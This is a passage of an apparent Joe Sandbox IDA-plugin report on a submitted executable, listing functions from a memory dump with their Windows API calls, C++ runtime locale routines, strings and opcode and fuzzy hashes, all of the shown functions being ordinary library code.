Download Yara Rule

APIs

Part of subcall function 00FECE30: GetLastError.KERNEL32(?,00000008,00FF267C), ref: 00FECE34
Part of subcall function 00FECE30: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FECED6

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00FF679C

Strings

utf8, xrefs: 00FF670B

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID: utf8
API String ID: 3736152602-905460609
Opcode ID: b2bf1599ff25141b4a9f31bfaa0e9e16735358ff193e6933739506e1c61c44e5
Instruction ID: 48f6e45b5cfa8926d196363b6d554548db7c4b1b57646ae706095edb7713952a
Opcode Fuzzy Hash: b2bf1599ff25141b4a9f31bfaa0e9e16735358ff193e6933739506e1c61c44e5
Instruction Fuzzy Hash: 2CF0283361010DABC714AB78DC45EBA73ECDF44315F000179F606D7240EE78AD02A790

Function 00FF68D5 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FECE30: GetLastError.KERNEL32(?,00000008,00FF267C), ref: 00FECE34
Part of subcall function 00FECE30: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FECED6

EnumSystemLocalesW.KERNEL32(00FF6BB3,00000001,?,?,-00000050,?,00FF6F55,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00FF691F

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 897559eb8845a070bd6f1ac973d722509144529b0077f450de9c3bab92ff140f
Instruction ID: 1fa16cdbce89e526caadb7279bd43e2404d7df7278a5d90de9fe866de9a2dd40
Opcode Fuzzy Hash: 897559eb8845a070bd6f1ac973d722509144529b0077f450de9c3bab92ff140f
Instruction Fuzzy Hash: 2EF0F6366043085FDB245F39DC91A7A7B95EF80768B15442CFA45CB6A0DAF1AC42E750

Function 00FEDDA0 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FE8AF9: EnterCriticalSection.KERNEL32(?,?,00FECB08,?,01008AB8,00000008,00FECCCC,?,00FE07D1,?), ref: 00FE8B08

EnumSystemLocalesW.KERNEL32(00FEDD93,00000001,01008B58,0000000C,00FEE167,00000000), ref: 00FEDDD8

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 375b70fd7662f176bdf85da49caed7013ff8a14789ef5ebf06fed22317bca95b
Instruction ID: ec22f223527c46c8bf6067ef666251f9e59151c1879d493e50e13b7698295f6c
Opcode Fuzzy Hash: 375b70fd7662f176bdf85da49caed7013ff8a14789ef5ebf06fed22317bca95b
Instruction Fuzzy Hash: 02F04972A60249DFEB10EF99E846B9D77B0FB08760F10402AF514DB2E0CBBA5940EB41

Function 00FF67EF Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FECE30: GetLastError.KERNEL32(?,00000008,00FF267C), ref: 00FECE34
Part of subcall function 00FECE30: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FECED6

EnumSystemLocalesW.KERNEL32(00FF6748,00000001,?,?,?,00FF6FB3,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00FF6826

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: a80f278d30a034de56a6b3ec6a1513c0448a3d4e6a349bfdcbab509d96190911
Instruction ID: 4d01708bfbae0e6237ae6956e7cb8142d0470dbdbe41fd78b76d0cae526af2b4
Opcode Fuzzy Hash: a80f278d30a034de56a6b3ec6a1513c0448a3d4e6a349bfdcbab509d96190911
Instruction Fuzzy Hash: D4F05C3670020957CB049F39D84567A7F94EFC1760B47005CEB05CB260DA71D843E790

Function 00FEE26B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00FEC0C1,?,20001004,00000000,00000002,?,?,00FEB6C3), ref: 00FEE29F

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 59e5ac3db7a9d7eb1068185df017f17a0caf3227f9f05c1513a07177c62f3106
Instruction ID: abbb35408d69779e1e194d1bd3e747db2c0170a66585f4bd61fd7caf2b218451
Opcode Fuzzy Hash: 59e5ac3db7a9d7eb1068185df017f17a0caf3227f9f05c1513a07177c62f3106
Instruction Fuzzy Hash: 21E04F3290069CBBCF222F62EC09AAE7F1EEF44760F008020FD0565171DB768921BA91

Function 00FDCBDA Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000CBE6,00FDC03E), ref: 00FDCBDF

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 68b744935e69c36a7ca8c6f3a9f07a42514916a08d4e2ed56ab3c9f6fb62de83
Instruction ID: d70de0f70a56ef532ef82c8de7619a49a66fa19b1791e2765a41b90a860de3f1
Opcode Fuzzy Hash: 68b744935e69c36a7ca8c6f3a9f07a42514916a08d4e2ed56ab3c9f6fb62de83
Instruction Fuzzy Hash:

Function 00FD5810 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

Offset in original filespace, xrefs: 00FD58E1

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: Offset in original filespace
API String ID: 0-3560768255
Opcode ID: 3b2baefbe263f6f637f3f115990e03ed983b83f42fba192f0866e2b5705f553b
Instruction ID: 7c1f93fc65397300fcbca5cdc22914da7f1a819e54dc5bcb2693739ad0980a3c
Opcode Fuzzy Hash: 3b2baefbe263f6f637f3f115990e03ed983b83f42fba192f0866e2b5705f553b
Instruction Fuzzy Hash: 633133212097908ED315AF78AC4576ABFE1AFD5308F5D4A7EE8D8C7393C528C404A7A2

Function 00FF7113 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00FF7113

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: da4aad43cdfd3842f683d035cf20049ad8525351d89badffc3138040f1bb6987
Instruction ID: 4478eba8f2f8bf61cb47c55cd7e958cab25d78d08a300c4661b47958db7a4556
Opcode Fuzzy Hash: da4aad43cdfd3842f683d035cf20049ad8525351d89badffc3138040f1bb6987
Instruction Fuzzy Hash: 09A02430501101CF5310CF34D704F0C37DC5D051C030400145404C4030DF3C4440F741

Function 00FD60F0 Relevance: .4, Instructions: 363COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98cc4811d103c4f27ab5047a067d2ea0c57608fc13e780fa45407ffdc4c99fe1
Instruction ID: 8fe11868490da403cd47406d6b9375b43d249ba64ebdb87486bcd9b803dc71ea
Opcode Fuzzy Hash: 98cc4811d103c4f27ab5047a067d2ea0c57608fc13e780fa45407ffdc4c99fe1
Instruction Fuzzy Hash: F4D1BE329087409FC714DF68CC41A2FB7E6BF88710F094A2EF989A7351D735E944AB92

Function 00FE24D3 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c938a62aa869522e5e1bf4f60e2bfb42b0da85a595a16a01e29afa549ad00ec3
Instruction ID: 9a724628dc2c8d9cd2a644315588d391e93216a3e250106bdff1a6b868d95584
Opcode Fuzzy Hash: c938a62aa869522e5e1bf4f60e2bfb42b0da85a595a16a01e29afa549ad00ec3
Instruction Fuzzy Hash: 08518372E00259EFDF04CF99C951AEEBBB6FF88310F198059E915AB201D734AE50DB90

Function 00FDD1F0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: dfdb682fd70df8203f9c81f8a3e48a65dd68cca4c5755d4b9a477937c9c93d22
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 12112777A4008243D6548A6DDCB46BBA797FBE633372C437BD0424BB58D222E945B600

Function 00FF2127 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1eebe2caae9b8a158f3128e1fabc652925f5f346da90b4f0161f2dbd429e670
Instruction ID: 94173cd9cd227aeb42a22a4636e3f1a903b8a7d91cc8d79ce7e498171aeef598
Opcode Fuzzy Hash: f1eebe2caae9b8a158f3128e1fabc652925f5f346da90b4f0161f2dbd429e670
Instruction Fuzzy Hash: F2E08C32921228EBCB14DBC8C90599AF3ECEB48F50B11449AB601D3220C2B4DE00D7D0

Function 00FEAB42 Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 789eabfe958f7fbf276463b672dcd62d1ec78b8d6d636716bbce1a8341d290d8
Instruction ID: 946340183fb8677459ca881140ca469edb5fdedb90e83ba7f4636e5ffabbd199
Opcode Fuzzy Hash: 789eabfe958f7fbf276463b672dcd62d1ec78b8d6d636716bbce1a8341d290d8
Instruction Fuzzy Hash: 0EC08C3880098086CE2A891092723B53396A7D2B92F80248CCA020B6C2C61EAC86F606

Function 00FD2570 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 209COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00FD2585
std::_Lockit::_Lockit.LIBCPMT ref: 00FD259F
std::_Lockit::~_Lockit.LIBCPMT ref: 00FD25C0
std::_Lockit::~_Lockit.LIBCPMT ref: 00FD2618
std::_Lockit::_Lockit.LIBCPMT ref: 00FD265D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00FD26AE
__Getctype.LIBCPMT ref: 00FD26C5
std::_Facet_Register.LIBCPMT ref: 00FD26EF
std::_Lockit::~_Lockit.LIBCPMT ref: 00FD2708

Part of subcall function 00FD9D07: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00FD9D13

std::_Lockit::_Lockit.LIBCPMT ref: 00FD2745
std::_Lockit::_Lockit.LIBCPMT ref: 00FD275F
std::_Lockit::~_Lockit.LIBCPMT ref: 00FD2780
std::_Lockit::~_Lockit.LIBCPMT ref: 00FD27DB

Strings

bad locale name, xrefs: 00FD2717

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
String ID: bad locale name
API String ID: 2137871723-1405518554
Opcode ID: 9bd15acc50f5c12bb80d035729eabb537132cd6f34559915c189615cf9d51156
Instruction ID: d4933a15438bd5bf1f7d74bd796da031de3606904f16f1c0a87c31803ad3ad01
Opcode Fuzzy Hash: 9bd15acc50f5c12bb80d035729eabb537132cd6f34559915c189615cf9d51156
Instruction Fuzzy Hash: 6E71C2329083008FC361EF58D980B5AB7A6EFA0720F1D055FE88597351D77AE909EBD2

Function 00FD2730 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00FD2745
std::_Lockit::_Lockit.LIBCPMT ref: 00FD275F
std::_Lockit::~_Lockit.LIBCPMT ref: 00FD2780
std::_Lockit::~_Lockit.LIBCPMT ref: 00FD27DB
std::_Lockit::_Lockit.LIBCPMT ref: 00FD2823
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00FD2881
__Getctype.LIBCPMT ref: 00FD2898
std::_Facet_Register.LIBCPMT ref: 00FD28EB
std::_Lockit::~_Lockit.LIBCPMT ref: 00FD2904

Strings

bad locale name, xrefs: 00FD2717, 00FD2913

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegister
String ID: bad locale name
API String ID: 2236780835-1405518554
Opcode ID: aab5c42e51f600e97f57e6dc7369c8f39c6645155f64ba8c792abc62d8d9726a
Instruction ID: be6655bb956128d062cb6720c4b55bd2e31d34966ac5a34193b5ec920549dd87
Opcode Fuzzy Hash: aab5c42e51f600e97f57e6dc7369c8f39c6645155f64ba8c792abc62d8d9726a
Instruction Fuzzy Hash: BC51E3329083448FC361DF68C940B5AB7E1EFA4710F18494FE98987322D779E985EBD2

Function 00FD23E0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00FD23F2
std::_Lockit::_Lockit.LIBCPMT ref: 00FD240F
std::_Lockit::~_Lockit.LIBCPMT ref: 00FD2430
std::_Lockit::~_Lockit.LIBCPMT ref: 00FD248B
std::_Lockit::_Lockit.LIBCPMT ref: 00FD24CC
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00FD250F
std::_Facet_Register.LIBCPMT ref: 00FD2538
std::_Lockit::~_Lockit.LIBCPMT ref: 00FD2551

Part of subcall function 00FD9D07: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00FD9D13

Strings

bad locale name, xrefs: 00FD2560

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Locinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
String ID: bad locale name
API String ID: 3096327801-1405518554
Opcode ID: 633c81b4572de22be0d50e5ae061c8ecda862a56cd8b8ee478c7b2c824ebc31a
Instruction ID: 95531bc00fe6ee7ff2d09cfaf2857e664c7c7a3822b8cda2a9d66c2c9c374201
Opcode Fuzzy Hash: 633c81b4572de22be0d50e5ae061c8ecda862a56cd8b8ee478c7b2c824ebc31a
Instruction Fuzzy Hash: 0D41A3319083118FC361EF58D880A5AB7A6BFA5720F0D491FE88997312D739D905EBD2

Function 00FD4390 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00FD4400
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00FD4455
Concurrency::cancel_current_task.LIBCPMT ref: 00FD45CB

Strings

true, xrefs: 00FD4502
., xrefs: 00FD4519
,, xrefs: 00FD455E
bad locale name, xrefs: 00FD45D0
false, xrefs: 00FD44EB

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: std::_$Concurrency::cancel_current_taskLocinfo::_Locinfo_ctorLockitLockit::_
String ID: ,$.$bad locale name$false$true
API String ID: 1995332507-3659324578
Opcode ID: 616dc8ed609d1049e545f464379b91db296c929adf4cabb156970ae90e767697
Instruction ID: 80dcb5554637d2f06ae226c01b9f594ca4dd0a7cdf4deaf6617b3c9e0313a2fc
Opcode Fuzzy Hash: 616dc8ed609d1049e545f464379b91db296c929adf4cabb156970ae90e767697
Instruction Fuzzy Hash: E5518B714083809FD320DF64C841B9BB7E9AF95700F088A1EF58997391E7B5E544DB93

Function 00FDBECD Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00FDBED3
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00FDBEE1
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00FDBEF2
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00FDBF03

Strings

GetTempPath2W, xrefs: 00FDBEF8
GetSystemTimePreciseAsFileTime, xrefs: 00FDBEE7
kernel32.dll, xrefs: 00FDBECE
GetCurrentPackageId, xrefs: 00FDBEDB

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: 9f6d3c58b8d80e5a2ba25a8dc9b3572b8a19622bdc457ae22d44843ed5dda719
Instruction ID: 0897e6fc2157064c4c8d57f4a837c3fcf29f66246c7866bc58fac99266487142
Opcode Fuzzy Hash: 9f6d3c58b8d80e5a2ba25a8dc9b3572b8a19622bdc457ae22d44843ed5dda719
Instruction Fuzzy Hash: 64E08C31911328AB83109FB4BC0C9763BADFE067003088926F605D2274EAB98009EB56

